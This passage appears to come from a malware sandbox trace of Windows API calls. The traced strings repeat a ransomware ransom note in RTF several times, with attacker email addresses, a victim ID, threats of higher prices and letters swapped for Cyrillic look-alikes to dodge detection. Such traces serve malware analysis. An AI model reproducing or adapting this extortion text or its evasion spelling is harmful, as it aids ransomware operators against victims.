y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.275] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.275] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 